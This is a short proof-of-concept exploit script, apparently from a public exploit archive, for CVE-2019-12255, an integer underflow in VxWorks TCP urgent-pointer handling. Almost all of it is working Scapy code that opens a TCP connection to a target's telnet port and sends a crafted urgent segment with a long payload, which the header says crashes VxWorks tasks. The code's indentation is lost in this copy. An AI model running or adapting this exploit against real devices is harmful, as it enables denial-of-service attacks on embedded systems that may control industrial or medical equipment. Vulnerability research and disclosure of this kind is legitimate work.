Share
# Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability  
# Discovered By: Armis Security  
# PoC Author: Zhou Yu (twitter: @504137480)  
# Vendor Homepage: https://www.windriver.com  
# Tested on: VxWorks 6.8  
# CVE: CVE-2019-12255  
# More Details: https://github.com/dazhouzhou/vxworks-poc/tree/master/CVE-2019-12255  
# The PoC can crash VxWorks tasks(set the port corresponding to the task in the PoC), such as telnet, ftp, etc.  
  
from scapy.all import *  
  
if __name__ == "__main__":  
ip = "192.168.10.199"  
dport = 23  
seq_num = 1000  
payload = "\x42"*2000  
sport = random.randint(1024,65535)  
  
syn = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "S", seq=seq_num)  
syn_ack = sr1(syn)  
  
seq_num = seq_num + 1  
ack_num = syn_ack.seq+1  
ack = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "A", seq=seq_num, ack=ack_num)  
send(ack)  
  
psh = IP(dst = ip)/TCP(sport = sport , dport = dport ,flags = "PAU", seq=seq_num, ack=ack_num, urgptr=0) / payload  
send(psh)